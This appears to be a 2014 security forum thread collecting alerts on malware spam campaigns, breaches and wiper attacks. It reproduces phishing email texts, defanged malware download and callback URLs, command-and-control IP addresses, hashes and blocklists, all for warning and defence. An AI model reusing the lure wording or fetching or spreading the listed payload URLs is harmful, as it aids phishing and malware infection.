hxxp ://bursalianneler .com/documents/fax.html

The downloaded file fax8642174_pdf contains the 21 kB large file fax8642174_pdf.exe. The trojan is known as Upatre.FH. The trojan will installs itself by creating the service ioiju.exe and makes sure that it boots when Windows starts, modifies several Windows registries... At the time of writing, 1 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/745a25bcff06daf957730207c8b34704288fc5232fac81a228a5f2b4f577f048/analysis/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.52.226: https://www.virustotal.com/en/ip-address/192.185.52.226/information/
78.46.73.197: https://www.virustotal.com/en/ip-address/78.46.73.197/information/
UDP communications
203.183.172.196: https://www.virustotal.com/en/ip-address/203.183.172.196/information/
203.183.172.212: https://www.virustotal.com/en/ip-address/203.183.172.212/information/
___

Fake 'JPMorgan Chase' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-received-new-secure-message-fake-pdf-malware/
17 Dec 2014 - "'JPMorgan Chase & Co You have received a new secure message' pretending to come from random names @jpmorgan .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Need Help?
Your personalized image for: <redacted>
This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE
Copyright 2013 JPMorgan Chase & Co. All rights reserved

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/You-have-received-a-new-secure-message.jpg

17 December 2014: message_zdm.zip: Extracts to: message_zdm.exe
Current Virus total detections: 11/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/25808f5afa8c93d477a954e4a0444b63fbaccac72a56dcd87d252df2606c0e19/analysis/1418844158/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
217.199.168.166: https://www.virustotal.com/en/ip-address/217.199.168.166/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.10.68.178: https://www.virustotal.com/en/ip-address/217.10.68.178/information/

- http://threattrack.tumblr.com/post/105464831328/jp-morgan-chase-secure-message-spam
Dec 18, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/af4b5b4c92d5319141774b223b9140b5/tumblr_inline_ngqwacJHwm1r6pupn.png
Tagged: JPMorgan, Upatre
___

ICANN e-mail accounts, zone database breached in spearphishing attack
Password data, other personal information of account holders exposed.
- http://arstechnica.com/security/2014/12/icann-e-mail-accounts-zone-database-breached-in-spearphishing-attack/
Dec 17 2014 - "Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group. ICANN, which oversees the Internet's address system, said in a release published Tuesday* that the breach also gave attackers administrative access to all files stored in its centralized zone data system**, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system. Domain registries use the database to help manage the current allocation of hundreds of new generic top level domains (gTLDs) currently underway. Attackers also gained unauthorized access to the content management systems of several ICANN blogs... As the group controlling the Internet's domain name system, ICANN is a prime target for all kinds of attacks from hackers eager to obtain data that can be used to breach other targets..."
* https://www.icann.org/news/announcement-2-2014-12-16-en

* https://czds.icann.org/en
___

Worm exploits nasty Shellshock bug to commandeer network storage systems
- http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/
Dec 15 2014 - "Criminal hackers are actively exploiting the critical shellshock vulnerability* to install a self-replicating backdoor on a popular line of storage systems, researchers have warned. The malicious worm targets network-attached storage systems made by Taiwan-based QNAP, according to a blog post published Sunday** by the Sans Institute. The underlying shellshock attack code exploits a bug in GNU Bash that gives attackers the ability to run commands and code of their choice on vulnerable systems. QNAP engineers released an update in October that patches systems against the vulnerability, but the discovery of the worm in the wild suggests a statistically significant portion of users have yet to apply it. Infected systems are equipped with a secure shell (SSH) server and a new administrative user, giving the attackers a persistent backdoor to sneak back into the device at any time in the future..."
* http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

** https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061

:fear::fear: :mad:

AplusWebMaster
2014-12-19, 13:52
FYI...

Fake 'BACS payment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/bacs-payment-ref9408yc-excel-xls-malware/
19 Dec 2014 - "'BACS payment Ref:9408YC' coming from random email addresses with a malicious Excel XLS attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please see below our payment confirmation for funds into your account on Tuesday re invoice 9408YC
Accounts Assistant
Tel: 01874 430 632
Fax: 01874 254 622

19 December 2014: 9408YC.xls - Current Virus total detections: 0/53* 0/55** 0/53***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbdc93de4eded4d2df825a30f0e255136c3564738e3298f367a4557b5b360eba/analysis/1418987287/

** https://www.virustotal.com/en/file/2894ad6bef05b0bba2c6f56194f7402c5535b03c7bedda7df7065269cd52cb39/analysis/1418987903/

*** https://www.virustotal.com/en/file/f26d6bc06ae906df591432cc5a5038589358f1681a64c896c468a72beccb70c5/analysis/1418987497/

- http://blog.dynamoo.com/2014/12/malware-spam-bacs-payment-ref901109rw.html
19 Dec 2014
> https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
"... UPDATE: A further version of this is doing the rounds with an attachment which also has zero detections at VirusTotal*..."
* https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
___

Fake ACH SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-blocked-transaction-case.html
19 Dec 2014 - "This -fake- ACH spam leads to malware:
Date: 19 December 2014 at 16:06
Subject: Blocked Transaction. Case No 970332
The Automated Clearing House transaction (ID: 732021371), recently initiated from your online banking account, was rejected by the other financial institution.
Canceled ACH transaction
ACH file Case ID 083520
Transaction Amount 1458.42 USD
Sender e-mail info@victimdomain
Reason of Termination See attached statement
Please open the word file enclosed with this email to get more info about this issue.

In the sample I have seen, the attachment is ACH transfer 1336.doc which despite the name is actually a .DOCX file, which has a VirusTotal dectection rate of 4/54*. Inside are a series of images detailing how to turn off macro security.. which is a very -bad- idea.
1] https://1.bp.blogspot.com/-zPH8zcx7OrY/VJR1Q7QBOEI/AAAAAAAAGAM/xX6zhss2M4Q/s1600/image3.png

2] https://2.bp.blogspot.com/-84ljBD1vRQg/VJR1Ru59Q2I/AAAAAAAAGAU/WcH0b9IEjII/s1600/image4.png

3] https://1.bp.blogspot.com/-vCCQWdg2iQ0/VJR1R9zpj1I/AAAAAAAAGAY/ASyT9ZXBVz8/s1600/image5.png

4] https://4.bp.blogspot.com/-cCjgc3glQpg/VJR1SDKNwjI/AAAAAAAAGAc/c_b1Rf1nawQ/s1600/image6.png

If you enable macros, then this macro... will run which will download a malicious binary from http ://nikolesy .com/tmp/ten.exe, this has a VirusTotal detection rate of 8/51** as is identified as the Dridex banking trojan."
* https://www.virustotal.com/en/file/332621eaa52f0289be55f01c6fa61dc93f541cfb52f718148958b72209e084ac/analysis/1419014981/

** https://www.virustotal.com/en/file/22015b1e727d0846fd051a1ee6bb8a243f2c8eb150d67bb8e0c82574eed694e4/analysis/1419015141/
___

Fake 'my-fax' SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-no-replaymy-faxcom.html
19 Dec 2014 - "This -fake- fax spam leads to malware:
From: Fax [no-replay@ my-fax .com]
Date: 19 December 2014 at 15:37
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: http ://crematori .org/myfax/company.html
Documents are encrypted in transit and store in a secure repository...

... Clicking the link downloads a file fax8127480_924_pdf.zip which in turn contains a malicious executable fax8127480_924.exe which has a VirusTotal detection rate of 3/55*. Most automated analysis tools are inconclusive... but the VT report shows network connections to the following locations:
http ://202.153.35.133:40542/1912uk22//0/51-SP3/0/
http ://202.153.35.133:40542/1912uk22//1/0/0/
http ://natural-anxiety-remedies .com/wp-includes/images/wlw/pack22.pne
Recommended blocklist:
202.153.35.133
natural-anxiety-remedies .com "
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/1419003908/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Fake 'Target Order Confirmation' - malware SPAM
- http://www.hoax-slayer.com/target-order-information-malware.shtml
Dec 19, 2014 - "Order confirmation email purporting to be from Target claims that the company's online store has an order addressed to you... The email is -not- from Target. The link in the message opens a compromised website that contains malware. The Target version is just one in a series of similar malware messages that have falsely claimed to be from well-known stores, including Walmart, Costco and Wallgreens...
> http://www.hoax-slayer.com/images/target-order-information-malware-1.jpg
If you use a non-Windows operating system, you may see a message claiming that the download is not compatible with your computer. If you are using one of the targeted operating systems, the malicious file may start downloading automatically. Alternatively, a message on the website may instruct you to click a link to download the file. Typically, the download will be a .zip file that hides a .exe file inside. Opening the .exe file will install the malware. The malware payload used in these campaigns can vary. But, typically, the malware can steal personal information from your computer and relay it to online scammers. The malware in this version is designed to add your computer to the infamous Asprox Botnet... This email is just one in a continuing series of malware messages that claim to be from various high profile stores, including Costco, Walmart and Wallgreens. Other versions list order or transaction details, but do not name any particular store. Again, links in the messages lead to malware websites. In some cases, the malware is contained in an attached file. If you receive one of these -bogus- emails, do -not- click any links or open any attachments..."
___

Walgreens Order Spam
- http://threattrack.tumblr.com/post/105606986528/walgreens-order-spam
Dec 19, 2014 - "Subjects Seen:
Order Status
Typical e-mail details:
E-shop Walgreens has received an order addressed to you which has to be confirmed by the recipient within 4 days. Upon confirmation you may pick it in any nearest store of Walgreens.
Detailed order information is provided here.
Walgreens

Malicious URLs:
rugby-game .com/search.php?w=ZT5EpruzameN92MeSlvI09DbnfrIhx1yqu3wrootEpM=
Malicious File Name and MD5:
Walgreens_OrderID-543759.exe (39CEBF3F19AF4C4F17CA5D8EFB940CB6)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/834af3262758a5dc4d3189db0af8a91d/tumblr_inline_ngu2ovU7f51r6pupn.png

Tagged: Walgreens, Kuluoz
___

Ars was briefly hacked yesterday; here’s what we know
If you have an account on Ars Technica, please change your password today..
- http://arstechnica.com/staff/2014/12/ars-was-briefly-hacked-yesterday-heres-what-we-know/
Dec 16 2014 - "At 20:00 CT on December 14, an Internet intruder gained access to one of the Ars Web servers and spent the next hour attempting to get from the Web server to a more central machine. At 20:52, the attempt was successful thanks to information gleaned from a poorly located backup file. The next day, at 14:13, the hacker returned to the central server and replaced the main Ars webpage with a defacement page that streamed a song from the band Dual Core... "All the Things"... by 14:29, our technical team had removed the defaced page and restored normal Ars operations. We spent the afternoon changing all internal passwords and certificates and hardening server security even further. Log files show the hacker's movements through our servers and suggest that he or she had the opportunity to copy the user database. This database contains no payment information on Ars subscribers, but it does contain user e-mail addresses and passwords. Those passwords, however, are stored in hashed form (using 2,048 iterations of the MD5 algorithm and salted with a random series of characters). Out of an excess of caution, we strongly encourage all Ars readers - especially any who have reused their Ars passwords on other, more sensitive sites - to change their passwords today. We are continuing with a full autopsy of the hack and will provide updates if anything new comes to light..."

:fear::fear: :mad:

AplusWebMaster
2014-12-21, 14:59
FYI...

Targeted Destructive Malware - Alert (TA14-353A)
- https://www.us-cert.gov/ncas/alerts/TA14-353A
Last revised: Dec 20, 2014 - "Systems Affected: Microsoft Windows
Overview: US-CERT was recently notified by a trusted third party of cyber threat actors using a Server Message Block (SMB) Worm Tool to conduct cyber exploitation activities recently targeting a major entertainment company. This SMB Worm Tool is equipped with a Listening Implant, Lightweight Backdoor, Proxy Tool, Destructive Hard Drive Tool, and Destructive Target Cleaning Tool.
SMB Worm Tool: This worm uses a brute force authentication attack to propagate via Windows SMB shares. It connects home every five minutes to send log data back to command and control (C2) infrastructure if it has successfully spread to other Windows hosts via SMB port 445. The tool also accepts new scan tasking when it connects to C2*. There are two main threads: the first thread calls home and sends back logs (a list of successful SMB exploitations), and the second thread attempts to guess passwords for SMB connections. If the password is correctly guessed, a file share is established and file is copied and run on the newly-infected host...
Destructive Hard Drive Tool: This tool is a tailored hard-drive wiping tool that is intended to destroy data past the point of recovery and to complicate the victim machine’s recovery. If the CNE operator has administrator-level privileges on the host, the program will over-write portions of up-to the first four physical drives attached, and over-write the master boot record (MBR) with a program designed to cause further damage if the hard drive is re-booted. This further results in the victim machine being non-operational with irrecoverable data (There is a caveat for machines installed with the windows 7 operating system: windows 7 machines will continue to operate in a degraded state with the targeted files destroyed until after reboot, in which the infected MBR then wipes the drive.) If the actor has user-level access, the result includes specific files being deleted and practically irrecoverable, but the victim machine would remain usable.
Destructive Target Cleaning Tool: This tool renders victim machines inoperable by overwriting the Master Boot Record. The tool is dropped and installed by another executable and consists of three parts: an executable and a dll which contain the destructive components, and an encoded command file that contains the actual destruction commands to be executed.
... *summary of the C2 IP addresses:
203.131.222.102 Thailand...
217.96.33.164 Poland...
88.53.215.64 Italy...
200.87.126.116 Bolivia...
58.185.154.99 Singapore...
212.31.102.100 Cypress...
208.105.226.235 United States..."
(More detail at the us-cert URL above.)

203.131.222.102: https://www.virustotal.com/en/ip-address/203.131.222.102/information/
217.96.33.164: https://www.virustotal.com/en/ip-address/217.96.33.164/information/
88.53.215.64: https://www.virustotal.com/en/ip-address/88.53.215.64/information/
200.87.126.116: https://www.virustotal.com/en/ip-address/200.87.126.116/information/
58.185.154.99: https://www.virustotal.com/en/ip-address/58.185.154.99/information/
212.31.102.100: https://www.virustotal.com/en/ip-address/212.31.102.100/information/
208.105.226.235: https://www.virustotal.com/en/ip-address/208.105.226.235/information/

- http://arstechnica.com/security/2014/12/malware-believed-to-hit-sony-studio-contained-a-cocktail-of-badness/
Dec 19 2014
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/c2-ip-addresses.png
___

Fake FedEx SPAM – malware
- http://myonlinesecurity.co.uk/fedex-postal-notification-service-malware/
20 Dec 2014 - "'Postal Notification Service' pretending to come from FedEx with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Fedex-Postal-Notification-Service.jpg

20 December 2014 : notification.zip: Extracts to: notification_48957348759483759834759834758934798537498.exe
Current Virus total detections: 1/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/777771b8483ce8a8503ed4cdd86d425c3088c17fa7794512913751d48421a860/analysis/1419076775/

"Package Delivery" Themed Scam Alert
- https://www.us-cert.gov/ncas/current-activity/2014/12/19/FTC-Releases-Package-Delivery-Themed-Scam-Alert
Dec 19, 2014
> http://www.consumer.ftc.gov/blog/package-delivery-scam-delivered-your-inbox

:fear: :mad:

AplusWebMaster
2014-12-22, 19:41
FYI...

Angler EK on 193.109.69.59
- http://blog.dynamoo.com/2014/12/angler-ek-on-1931096959.html
22 Dec 2014 - "193.109.69.59 (Mir Telematiki Ltd, Russia) is hosting what appears to be the Angler Exploit Kit... infection chain... The last step is where the badness happens, hosted on 193.109.69.59 (Mir Telematiki Ltd, Russia) which is also being used to host the following malicious domains:
qwe.holidayspeedsix .biz
qwe.holidayspeedfive .biz
qwe.holidayspeedseven .biz
A quick look at the contents of 193.109.68.0/23 shows some other questionable sites. A look at the sites hosted* in this /23 indicates that most of them appear to be selling counterfeit goods, so -blocking- the entire /23 will probably be no great loss.
Recommended -minimum- blocklist:
193.109.69.59
holidayspeedsix .biz
holidayspeedfive .biz
holidayspeedseven .biz "
* http://www.dynamoo.com/files/mmuskatov.csv

193.109.69.59: https://www.virustotal.com/en/ip-address/193.109.69.59/information/
___

Fake 'Tiket alert' SPAM
- http://blog.dynamoo.com/2014/12/tiket-alert-spam-tiket-really.html
22 Dec 2014 - "Sometimes the spammers don't really try very hard. Like they have to make a quota or something. A "Tiket alert" from the FBI.. or is it FBR? Really?

From: FBR service [jon.wo@ fbi .com]
Date: 22 December 2014 at 18:29
Subject: Tiket alert
Look at the link file for more information.
http <redacted>
Assistant Vice President, FBR service
Management Corporation

I have seen another version of this where the download location is negociomega .com/ticket/fsb.html. Clicking on the link downloads a file ticket8724_pdf.zip which in turn contains a malicious executable ticket8724_pdf.exe. This has a VirusTotal detection rate of 2/54*. Between that VirusTotal analysis and the Anubis analysis we can see that the malware attempts to phone home to:
http ://202.153.35.133 :42463/2212us12//0/51-SP3/0/
http ://202.153.35.133 :42463/2212us12//1/0/0/
http ://moorfuse .com/images/unk12.pne
202.153.35.133 is Excell Media Pvt Ltd, India.
Recommended blocklist:
202.153.35.133
moorfuse .com
mitsuba-kenya .com
negociomega .com "
* https://www.virustotal.com/en/file/131855bdd2832705bf8c90f30efd43a22956ca86bab19f3a9941158fd33291af/analysis/1419277515/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
188.132.231.115: https://www.virustotal.com/en/ip-address/188.132.231.115/information/
___

Fake 'Employee Documents' Fax SPAM
- http://blog.mxlab.eu/2014/12/19/email-employee-documents-internal-use-from-no-replaymy-fax-com-leads-to-malicious-zip-file/
Dec 19, 2014 - "... intercepted quite a large distribution campaign by email with the subject “Employee Documents – Internal Use”, this email is sent from the spoofed address “Fax <no-replay@ my-fax .com>” and has the following body:
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: ... <redacted>
Documents are encrypted in transit and store in a secure repository ...

The downloaded file fax8127480_924_pdf.zip contains the 26 kB large file fax8127480_924.exe. The trojan is known as W32/Trojan.HZAT-8029, W32/Trojan3.MYF, Downloader-FSH!FFA9EE754457, Upatre.FH or a variant of Win32/Kryptik.CTMJ... Virus Total*..."
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/
File name: fax8127480_924.exe
Detection ratio: 26/53
Analysis date: 2014-12-22
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.127.104.112: https://www.virustotal.com/en/ip-address/174.127.104.112/information/
83.166.234.251: https://www.virustotal.com/en/ip-address/83.166.234.251/information/
23.10.252.26: https://www.virustotal.com/en/ip-address/23.10.252.26/information/
50.7.247.42: https://www.virustotal.com/en/ip-address/50.7.247.42/information/
217.172.180.178: https://www.virustotal.com/en/ip-address/217.172.180.178/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/

:fear::fear: :mad:

AplusWebMaster
2014-12-23, 15:33
FYI...

Fake 'Remittance Advice' SPAM - malicious Excel attachment
- http://blog.dynamoo.com/2014/12/remittance-advice-spam-comes-with.html
23 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Whitney
Date: 23 December 2014 at 09:12
Subject: Remittance Advice -DPRC93
Confidentiality and Disclaimer: This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error...

The reference in the subject varies, and the name of the attachment always matches (so in this case DPRC93.xls). There are in fact three different versions of the document, all of which have a malicious macro. At the moment, none of these are detected by anti-virus vendors [1] [2] [3]... the macro has now changed completely, as it now loads some of the data from the Excel spreadsheet itself and puts it into a file %TEMP%\windows.vbs. So far I have seen three different scripts... which download a component from one of the following locations:
http ://185.48.56.133:8080/sstat/lldvs.php
http ://95.163.121.27:8080/sstat/lldvs.php
http ://92.63.88.100:8080/sstat/lldvs.php
It appears that this email is downloaded as test.exe and is then saved as %TEMP%\servics.exe. The ThreatExpert report shows traffic to the following:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer AG, Germany)
VirusTotal indicates a detection rate of just 3/54*, and identifies it as Dridex.
Recommended blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
185.48.56.133
95.163.121.27
92.63.88.100
92.63.88.106
Note that there are two IPs acting as downloaders in the 92.63.88.0/24 range (MWTV, Latvia). It may be that you would also want to block that range as well."
1] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/

2] https://www.virustotal.com/en/file/87bb64f9e759f93b0b47c1c8af917c5a11d66221fe146bbbc26373560c96a0fe/analysis/1419330170/

3] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/

* https://www.virustotal.com/en/file/a9239d875ecd1dbf4d83e1112c07c49b99b2594262b6a57e0eaa0518390d5ffb/analysis/1419333104/

- http://myonlinesecurity.co.uk/remittance-advice-pzdf16-excel-xls-malware/
23 Dec 2014
> 22 Dec 2014 : PZDF16.xls Current Virus total detections: 0/55*:
TKBJ98.xls Current Virus total detections: 0/55**
* https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419328785/

** https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/1419329398/

- http://blog.mxlab.eu/2014/12/23/email-remittance-advice-lcdq26-contains-excel-file-with-malicious-macro/
Dec 23 2014
> https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/
___

Fake 'CHRISTMAS OFFERS.docx' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/jayne-route2fitness-co-uk-christmas-offers-docx-word-doc-malware/
23 Dec 2014 - "'CHRISTMAS OFFERS.docx' pretending to come from Jayne <Jayne@ route2fitness .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email body is completely -blank- . As per usual there are at least 2 different file sizes of this malware although all are named exactly the same.

22 Dec 2014: CHRISTMAS OFFERS.doc (41 kb) . Current Virus total detections: 0/55* : CHRISTMAS OFFERS.doc (44 kb) . Current Virus total detections: 0/56**
Downloads dridex Trojan from microinvent .com//js/bin.exe which is moved to and run from %temp%1\V2MUY2XWYSFXQ.exe Virus total*** ..."
* https://www.virustotal.com/en/file/0c45d7f517f1086528576c5b696303b792c29244dc0a4421f3720ed84a521b2e/analysis/1419327481/

** https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/1419327349/

*** https://www.virustotal.com/en/file/de25222783cdcbe20ca8d8d9a531f150387260e5297f672474141227eeff7773/analysis/1419334606/

- http://blog.mxlab.eu/2014/12/23/empty-email-with-attached-word-file-christmas-offers-docx-contains-malicious-macro/
Dec 23, 2014
> https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/
___

Network Time Protocol Vulnerabilities
- https://ics-cert.us-cert.gov//advisories/ICSA-14-353-01
Dec 22, 2014 - "... vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available. Products using NTP service prior to NTP-4.2.8 are affected. No specific vendor is specified because this is an open source protocol.
IMPACT: Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process..."

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295 - 7.5 (HIGH)

- http://arstechnica.com/security/2014/12/attack-code-exploiting-critical-bugs-in-net-time-sync-puts-servers-at-risk/
Dec 19 2014

:fear::fear: :mad:

AplusWebMaster
2014-12-24, 10:51
FYI...

MBR Wiper attacks strike Korean Power Plant
- http://blog.trendmicro.com/trendlabs-security-intelligence/mbr-wiper-attacks-strike-korean-power-plant/
Dec 23, 2014 - "In recent weeks, a major Korean electric utility has been affected by destructive malware, which was designed to wipe the master boot records (MBRs) of affected systems. It is believed that this MBR wiper arrived at the target systems in part via a vulnerability in the Hangul Word Processor (HWP), a commonly used application in South Korea. A variety of social engineering lures were used to get would-be victims to open these files. Below is a quick overview of the attack with the infection chain starting from a spearphishing email sent to the employees’ inboxes:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/Infection-chain_MBR-wiper3.png
We detect the malware as TROJ_WHAIM.A*, which is a fairly straightforward MBR wiper. In addition to the MBR, it also overwrites files that are of specific types on the affected system. It installs itself as a service on affected machines to ensure that it will run whenever the system is restarted... it uses file names, service names, and descriptions of actual legitimate Windows services. This ensures that a cursory examination of a system’s services may not find anything malicious, helping this threat -evade- detection... This particular MBR-wiping behavior, while uncommon, has been seen before. We observed these routines in March 2013 when several attacks hit various South Korean government agencies resulting in major disruptions to their operations. The malware involved in this attack overwrote the MBR with a series of the words PRINCPES, HASTATI, or PR!NCPES. The recent attack on Sony Pictures also exhibited a similar MBR-wiping capability. There are also similarities to the previous MBR wiper attacks as well. All three attacks mentioned earlier overwrite the MBR with certain repeated strings... These attacks highlight our findings about the destructive, MBR-wiping malware that appear to have become a part of the arsenal of several threat actors. This is a threat that system administrators will have to deal with, and not all targeted attack countermeasures will be effective. Techniques to mitigate the damage that these attacks cause should be considered as a part of defense-in-depth networks.
Update as of 11:29 P.M. PST, December 23, 2014
Upon further analysis, we confirmed that TROJ_WHAIM.A checks if the current date and time is Dec 10, 2014 11:00 AM or later. If it meets this condition, it sets the registry, HKEY_LOCAL_MACHINE\SOFTWARE\PcaSvcc\finish to 1, thus triggering the MBR infection. Otherwise, it sleeps for a minute and checks the system time again. Aside from the MBR infection capabilities and overwriting certain strings, another similarity of this attack to the March 2013 incident is its ‘time bomb’ routine. A certain action is set in motion once the indicated date/time by the attackers is reached by the infected system."
* http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_whaim.a
"To restore your system's Master Boot Record (MBR)..."

South Korea seeks China's cooperation in probe into cyberattack on nuclear operator
- http://www.reuters.com/article/2014/12/24/us-northkorea-cybersecurity-nuclear-idUSKBN0K20DT20141224
Dec 24, 2014 - "... Connections to South Korean virtual private networks (VPNs) used in the cyberattacks were traced to multiple IP addresses in China's Shenyang city, located in a province which borders North Korea..."

Japan, wary of North Korea, works to secure infrastructure after Sony attack
- http://www.reuters.com/article/2014/12/24/us-northkorea-cyberattack-japan-idUSKBN0K20IX20141224
Dec 24, 2014 - "Japan, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said... The government's National Information Security Center, working through various ministries, is pressing companies to improve their security from cyberattacks..."

Attack maps: http://map.ipviking.com/
___

Fake 'Signature Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/malware-spam-rhianna-wellings.html
24 Dec 2014 - "Teckentrup Depot UK is a legitimate UK company, but these emails are -not- from Teckentrup Depot and they contain a malicious attachment. Teckentrup Depot has not been hacked, their database has not been compromised, and they are -not- responsible for this in any way.
From: Rhianna Wellings [Rhianna@ teckentrupdepot .co.uk]
Date: 24 December 2014 at 07:54
Subject: Signature Invoice 44281
Your report is attached in DOC format.
To load the report, you will need the Microsoft® Word® reader...

Attached is a malicious Word document called Signature Invoice.doc which comes in two different versions, both of which are undetected by AV vendors [1] [2]. Each one contains a different macro... which then downloads an additional component from one of these two locations:
http ://Lichtblick-tiere .de/js/bin.exe
http ://sunfung .hk/js/bin.exe
The file is saved into the location %TEMP%\1V2MUY2XWYSFXQ.exe and currently has a VirusTotal detection rate of just 4/56*. The ThreatExpert report shows traffic to the following IPs:
74.208.11.204 (1&1 Internet, US)
81.169.156.5 (Strato AG, Germany)
59.148.196.153 (HKBN, Hong Kong)
According to the Malwr report it also drops a malicious DLL with a detection rate of 24/56**, detected as the Dridex banking trojan.
Recommended blocklist:
74.208.11.204
81.169.156.5
59.148.196.153
lichtblick-tiere .de
sunfung .hk "
1] https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419412603/

2] https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419412612/

* https://www.virustotal.com/en/file/1f56a9ae1984cc1c9435609c0c63845fe0eebaa025fd24387829d280e7dfafcc/analysis/1419413157/

** https://www.virustotal.com/en/file/f259feff8c187b51dabb766491df61c8f0de1345427b337536c2ee4550ac937d/analysis/1419417434/

